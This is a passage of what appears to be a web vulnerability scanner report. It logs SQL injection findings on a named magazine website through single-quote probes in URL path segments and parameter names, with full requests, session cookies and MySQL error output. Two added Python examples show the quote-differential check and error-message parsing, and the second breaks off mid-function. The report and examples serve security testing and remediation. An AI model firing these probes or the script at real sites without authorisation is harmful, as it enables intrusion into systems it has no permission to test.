The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.64. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.65. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the error text in Response 1 echoes the entire request URI (/component/chronocontact/?chronoformname=PSPage') immediately followed by "AND cookie_info=", so the injection point is the raw request line being concatenated into a query rather than anything specific to chronoformname; the same "AND cookie_info=''" fragment appears for every path and parameter name tested on this host.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The underlying fix is to build this query with a prepared statement (bound parameters) so that a quote in the request URI, a parameter or a cookie is passed as data rather than parsed as SQL. The verbose SQL/DB Error output should also be disabled, since it discloses the query structure and the DBMS type, but suppressing the message on its own only hides the injection and does not remove it.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
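The single-quote / double-quote check described under "Issue detail" above, as an added example that is not part of this scanner report or of the site's own code. It runs the probe against a constructed stand-in page that concatenates the raw request URI into a query of the shape the error fragments reveal (a quoted literal followed by AND cookie_info='...'), beside a hardened version using bound parameters. The table name page_hits, the column url and the sample row are assumptions; cookie_info is taken from the report's error text; SQLite stands in for MySQL, whose error wording differs but whose quoting rule (a doubled quote inside a literal is an escaped quote) is the same.

```python
"""Error-based SQL injection probe: the single-quote / double-quote differential.

Added example; not code from this scanner report or from the site it describes.
The stand-in page copies the query shape visible in the report's error fragments
(near ''/component/content/article/237622'' AND cookie_info='''): the request
URI inside a quoted literal, followed by AND cookie_info='...'. Table page_hits,
column url and the sample row are assumptions; cookie_info is from the report.
SQLite stands in for MySQL; the quoting rule the check relies on is the same.
"""
import re
import sqlite3
from typing import Callable, Optional

# (engine, pattern) in order of specificity; only the two engines used here.
DB_ERROR_SIGNATURES = [
    ("MySQL", re.compile(r"You have an error in your SQL syntax")),
    ("SQLite", re.compile(r'unrecognized token|near ".*": syntax error')),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE page_hits (url TEXT, cookie_info TEXT, hits INTEGER)")
    db.execute("INSERT INTO page_hits VALUES ('/component/chronocontact/', '', 5)")
    return db


def vulnerable_page(db: sqlite3.Connection, request_uri: str, cookie_info: str = "") -> str:
    """BAD: the raw request URI is concatenated into SQL and the DB error is echoed."""
    sql = (f"SELECT hits FROM page_hits WHERE url='{request_uri}' "
           f"AND cookie_info='{cookie_info}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"<blockquote><b>SQL/DB Error --</b> [{exc}]</blockquote>"
    return f"<html>hits={row[0] if row else 0}</html>"


def hardened_page(db: sqlite3.Connection, request_uri: str, cookie_info: str = "") -> str:
    """GOOD: bound parameters keep the quote as data; errors are not echoed."""
    try:
        row = db.execute("SELECT hits FROM page_hits WHERE url=? AND cookie_info=?",
                         (request_uri, cookie_info)).fetchone()
    except sqlite3.Error:
        return "<html>Sorry, something went wrong.</html>"  # log server-side instead
    return f"<html>hits={row[0] if row else 0}</html>"


def fingerprint(body: str) -> Optional[str]:
    """Name the database engine if a known error signature appears in the body."""
    for name, pattern in DB_ERROR_SIGNATURES:
        if pattern.search(body):
            return name
    return None


def quote_differential(fetch: Callable[[str], str], uri: str, inject_at: int) -> dict:
    """Send ' and then '' at one offset of the URI and compare the two responses.

    A database error for the single quote that disappears for the doubled quote
    means the input lands inside a quoted SQL literal; that is the signal behind
    the report's "Confidence: Certain". inject_at may be the end of a path
    segment (a REST URL parameter) or a position inside a parameter name.
    """
    single = uri[:inject_at] + "'" + uri[inject_at:]
    double = uri[:inject_at] + "''" + uri[inject_at:]
    db_single = fingerprint(fetch(single))
    db_double = fingerprint(fetch(double))
    return {
        "probe_single": single,
        "probe_double": double,
        "database": db_single,
        "likely_sqli": db_single is not None and db_double is None,
    }


if __name__ == "__main__":
    db = make_db()
    article = "/component/content/article/237622"  # 1.69 shape: REST URL parameter 4
    param = "/component/chronocontact/?1=1"         # 1.66 shape: parameter name
    for label, page in (("vulnerable", vulnerable_page), ("hardened", hardened_page)):
        fetch = lambda u, page=page: page(db, u)
        print(label, quote_differential(fetch, article, len(article)))
        print(label, quote_differential(fetch, param, param.index("=")))
```

Against the vulnerable stand-in the single quote leaves the literal open and the doubled quote is swallowed as an escaped character, exactly the pattern in Responses 1 and 2 above; against the hardened version both probes return a normal page, so the differential reports nothing.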

1.67. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.68. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.69. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In Response 1 below, the fragment MySQL quotes begins with the full request URI ('/component/content/article/237622'), so it is the entire URI, not an individual path segment, that is concatenated into the string literal; that single query is why every REST URL parameter and every parameter name on this host trips the same error.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error removes the oracle but not the injection: the affected input must also stop reaching the database as SQL text, so bind it as a query parameter (prepared statement) and, where the code still builds SQL by string concatenation, at minimum escape it with the driver's quoting function.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
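Reading the injection context out of the "near ..." fragment, as an added example that is not part of this scanner report or of the site's code. MySQL quotes the unparsed remainder of the statement after "near", truncated (the two 80-character fragments in 1.71 and 1.72 are cut mid-token); lined up against the URI that was sent, the remainder shows what the application appended after the input and therefore what a payload would have to close. The three messages are copied from Response 1 of 1.66, 1.69 and 1.71 with the HTML stripped; the query shape read out of them (... = '<request URI>' AND cookie_info='...') is an inference from that text, not something the report states.

```python
"""Read the injection context out of MySQL's 'near ...' syntax error.

Added example; not part of this scanner report or of the site's code. The three
messages are copied from Response 1 of entries 1.66, 1.69 and 1.71 (HTML
stripped) together with the request URI each was produced by. The query shape
inferred from them (... = '<request URI>' AND cookie_info='...') is a reading of
that text, not a statement of the report.
"""
import re
from typing import Optional

NEAR_RE = re.compile(r"right syntax to use near '(?P<frag>.*)' at line (?P<line>\d+)", re.S)

PREFIX = ("You have an error in your SQL syntax; check the manual that corresponds "
          "to your MySQL server version for the right syntax to use near ")

# entry -> (request URI as sent, error message as returned)
SAMPLES = {
    "1.66": ("/component/chronocontact/?1'=1",
             PREFIX + "'' AND cookie_info=''' at line 1"),
    "1.69": ("/component/content/article/237622'",
             PREFIX + "''/component/content/article/237622'' AND cookie_info=''' at line 1"),
    "1.71": ("/component'/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29t"
             "L25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0"
             "LWFuZC1uZXcteW9yay1qYW4%3D",
             PREFIX + "'?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1"),
}


def parse_near(message: str) -> Optional[dict]:
    """Pull the quoted fragment and line number out of a MySQL parse error."""
    m = NEAR_RE.search(message)
    if m is None:
        return None
    frag = m.group("frag")
    # MySQL cuts the fragment at 80 characters; a full-length one is truncated.
    return {"fragment": frag, "line": int(m.group("line")), "truncated": len(frag) >= 80}


def infer_context(message: str, request_uri: str) -> Optional[dict]:
    """Relate the fragment MySQL quoted to the text that was actually sent."""
    parsed = parse_near(message)
    if parsed is None:
        return None
    frag = parsed["fragment"]
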